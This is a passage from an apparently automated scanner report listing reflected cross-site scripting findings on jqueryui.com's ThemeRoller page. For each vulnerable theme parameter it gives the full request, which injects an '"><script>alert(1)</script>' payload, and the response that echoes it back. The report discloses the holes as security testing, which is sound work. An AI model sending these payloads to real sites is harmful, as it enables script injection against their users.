bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75fb22a"><script>alert(1)</script>8dcb00c57c8&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgC
...[SNIP]...

1.73. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7294b"><script>alert(1)</script>0b2f30c780e was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=07294b"><script>alert(1)</script>0b2f30c780e&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=07294b"><script>alert(1)</script>0b2f30c780e&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="te
...[SNIP]...

1.74. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef8af"><script>alert(1)</script>bb639f52f51 was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0ef8af"><script>alert(1)</script>bb639f52f51&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0ef8af"><script>alert(1)</script>bb639f52f51&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.75. http://jqueryui.com/themeroller/ [bgTextureActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7769a"><script>alert(1)</script>1f24aa516b9 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png7769a"><script>alert(1)</script>1f24aa516b9&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
onColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png7769a"><script>alert(1)</script>1f24aa516b9&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHig
...[SNIP]...

1.76. http://jqueryui.com/themeroller/ [bgTextureContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f9a1"><script>alert(1)</script>07a06ed0f2b was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png7f9a1"><script>alert(1)</script>07a06ed0f2b&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
s=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png7f9a1"><script>alert(1)</script>07a06ed0f2b&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault
...[SNIP]...

1.77. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39f6c"><script>alert(1)</script>4d606b712ae was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png39f6c"><script>alert(1)</script>4d606b712ae&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
r=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png39f6c"><script>alert(1)</script>4d606b712ae&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&ic
...[SNIP]...

1.78. http://jqueryui.com/themeroller/ [bgTextureError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3e1d"><script>alert(1)</script>b0705c51f was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pnge3e1d"><script>alert(1)</script>b0705c51f&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 119997

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pnge3e1d"><script>alert(1)</script>b0705c51f&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgText
...[SNIP]...

1.79. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb6ba"><script>alert(1)</script>c860704192d was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.pngeb6ba"><script>alert(1)</script>c860704192d&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.pngeb6ba"><script>alert(1)</script>c860704192d&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=2222
...[SNIP]...

1.80. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e5e2"><script>alert(1)</script>5ad0d53056f was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png1e5e2"><script>alert(1)</script>5ad0d53056f&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
er=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png1e5e2"><script>alert(1)</script>5ad0d53056f&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=c
...[SNIP]...

1.81. http://jqueryui.com/themeroller/ [bgTextureHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5eb42"><script>alert(1)</script>d0177921a09 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png5eb42"><script>alert(1)</script>d0177921a09&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png5eb42"><script>alert(1)</script>d0177921a09&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconC
...[SNIP]...

